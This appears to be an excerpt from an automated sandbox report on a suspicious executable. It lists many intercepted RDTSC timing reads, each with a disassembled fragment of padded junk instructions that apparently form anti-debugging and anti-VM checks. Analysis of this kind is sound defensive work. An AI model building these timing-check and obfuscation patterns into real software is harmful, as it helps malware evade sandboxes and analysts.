Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A7AA second address: C3A7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FDAD10EAC38h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1FA6h], ebx 0x0000002b nop 0x0000002c jmp 00007FDAD10EAC3Ch 0x00000031 push eax 0x00000032 pushad 0x00000033 push ecx 0x00000034 jnp 00007FDAD10EAC36h 0x0000003a pop ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3A929 second address: C3A92F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3AEDF second address: C3AEE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FDAD10EAC36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B2D2 second address: C3B2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B399 second address: C3B3B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC49h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3B3B6 second address: C3B3DE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDAD0CA5E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FDAD0CA5E36h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1A4CE second address: C1A4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FDF1 second address: C6FE08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FDAD0CA5E2Eh 0x0000000c js 00007FDAD0CA5E26h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FE08 second address: C6FE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FE13 second address: C6FE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FE17 second address: C6FE21 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDAD10EAC36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FE21 second address: C6FE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FDAD0CA5E32h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FF99 second address: C6FFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C70512 second address: C7051C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDAD0CA5E2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C763C8 second address: C763CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74E33 second address: C74E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74E3B second address: C74E48 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDAD10EAC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C750F1 second address: C75101 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDAD0CA5E26h 0x00000008 je 00007FDAD0CA5E26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75101 second address: C7511B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC46h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7511B second address: C7511F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7511F second address: C75125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C753F1 second address: C753F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C753F5 second address: C753F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C753F9 second address: C75405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDAD0CA5E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75405 second address: C75436 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDAD10EAC38h 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FDAD10EAC5Fh 0x00000014 jmp 00007FDAD10EAC47h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75436 second address: C7543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7543A second address: C7543E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C756EA second address: C756EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C756EE second address: C75701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FDAD10EAC3Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C759E9 second address: C759ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C759ED second address: C759F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C759F3 second address: C759FD instructions: 0x00000000 rdtsc 0x00000002 js 00007FDAD0CA5E2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75DEF second address: C75DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C76235 second address: C7623B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7623B second address: C76244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C76244 second address: C76256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FDAD0CA5E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74BB7 second address: C74BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79E6B second address: C79E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FDAD0CA5E26h 0x00000009 jmp 00007FDAD0CA5E2Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79FD9 second address: C79FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7CD05 second address: C7CD36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAD0CA5E34h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7CD36 second address: C7CD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7CD3A second address: C7CD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7CD40 second address: C7CD47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7CD47 second address: C7CD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDAD0CA5E39h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7CD69 second address: C7CD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E89D second address: C7E8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007FDAD0CA5E26h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E8B4 second address: C7E8EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC40h 0x00000007 jmp 00007FDAD10EAC40h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f jc 00007FDAD10EAC6Eh 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jg 00007FDAD10EAC36h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E8EA second address: C7E8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDAD0CA5E26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7E8FB second address: C7E8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C82CFE second address: C82D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDAD0CA5E26h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C82D0C second address: C82D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAD10EAC42h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C82D2A second address: C82D3E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDAD0CA5E2Eh 0x00000008 jne 00007FDAD0CA5E26h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C82EB3 second address: C82ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FDAD10EAC48h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85DC9 second address: C85DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85DD3 second address: C85DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85DD7 second address: C85DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85DDB second address: C85DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85DE1 second address: C85E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007FDAD0CA5E41h 0x0000000d jmp 00007FDAD0CA5E35h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E05 second address: C85E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007FDAD10EAC36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C860D0 second address: C860D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8B5DE second address: C8B5F0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDAD10EAC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FDAD10EAC36h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8B6FF second address: C8B703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8B703 second address: C8B72D instructions: 0x00000000 rdtsc 0x00000002 je 00007FDAD10EAC42h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FDAD10EAC41h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C91C12 second address: C91C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C91C1A second address: C91C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C91C20 second address: C91C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C92B0F second address: C92B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDAD10EAC36h 0x0000000a popad 0x0000000b ja 00007FDAD10EAC3Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C92B28 second address: C92B3A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDAD0CA5E2Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9340D second address: C93413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C93413 second address: C93427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FDAD0CA5E26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FDAD0CA5E26h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C936BE second address: C936F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FDAD10EAC6Dh 0x0000000e pushad 0x0000000f jno 00007FDAD10EAC36h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007FDAD10EAC49h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C936F3 second address: C936F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C936F9 second address: C936FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9776F second address: C97774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C97774 second address: C977B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDAD10EAC36h 0x0000000a jmp 00007FDAD10EAC48h 0x0000000f popad 0x00000010 jbe 00007FDAD10EAC3Ah 0x00000016 pop edx 0x00000017 pop eax 0x00000018 je 00007FDAD10EAC56h 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C98119 second address: C9811E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9811E second address: C98145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDAD10EAC36h 0x0000000a popad 0x0000000b jmp 00007FDAD10EAC45h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4517 second address: CA4526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FDAD0CA5E26h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA4526 second address: CA452A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA452A second address: CA4530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2BCB second address: CA2BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2D1D second address: CA2D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2D23 second address: CA2D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 jl 00007FDAD10EAC36h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FDAD10EAC46h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3008 second address: CA3037 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDAD0CA5E38h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3037 second address: CA3054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC49h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3054 second address: CA305A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3566 second address: CA356B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA356B second address: CA3570 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3570 second address: CA3589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDAD10EAC36h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FDAD10EAC36h 0x00000013 ja 00007FDAD10EAC36h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3589 second address: CA35A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA35A6 second address: CA35B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA35B2 second address: CA35B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA35B9 second address: CA35C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FDAD10EAC36h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA43C1 second address: CA43C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2308 second address: CA2322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC44h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAB434 second address: CAB43F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAB43F second address: CAB443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAB5AC second address: CAB5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAB5B1 second address: CAB5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jnl 00007FDAD10EAC36h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jp 00007FDAD10EAC3Ch 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007FDAD10EAC38h 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
